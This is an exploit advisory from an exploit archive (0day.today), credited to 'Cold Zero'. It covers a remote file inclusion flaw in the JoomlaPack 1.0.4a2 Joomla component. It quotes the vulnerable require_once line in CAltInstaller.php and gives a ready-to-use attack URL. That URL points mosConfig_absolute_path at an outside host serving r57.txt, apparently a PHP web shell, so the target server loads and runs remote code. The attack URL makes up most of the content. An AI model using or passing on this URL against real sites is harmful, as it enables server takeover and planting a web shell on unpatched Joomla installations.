id: 1770
date: 04/16/2007
title: Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI
author: Cold Zero
cves: 

==============================================================
Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI
==============================================================



=======================================================
Jommla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) Remote File 
Include Vulnerabilities
=======================================================
Script Site : 
http://joom.ru/component/option,com_remository/Itemid,52/func,fileinfo/id,170/
==============================================
File : /CAltInstaller.php
require_once( $mosConfig_absolute_path . 
'/includes/domit/xml_domit_lite_include.php' );
======
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
========================================================



#  0day.today [2023-03-21]  #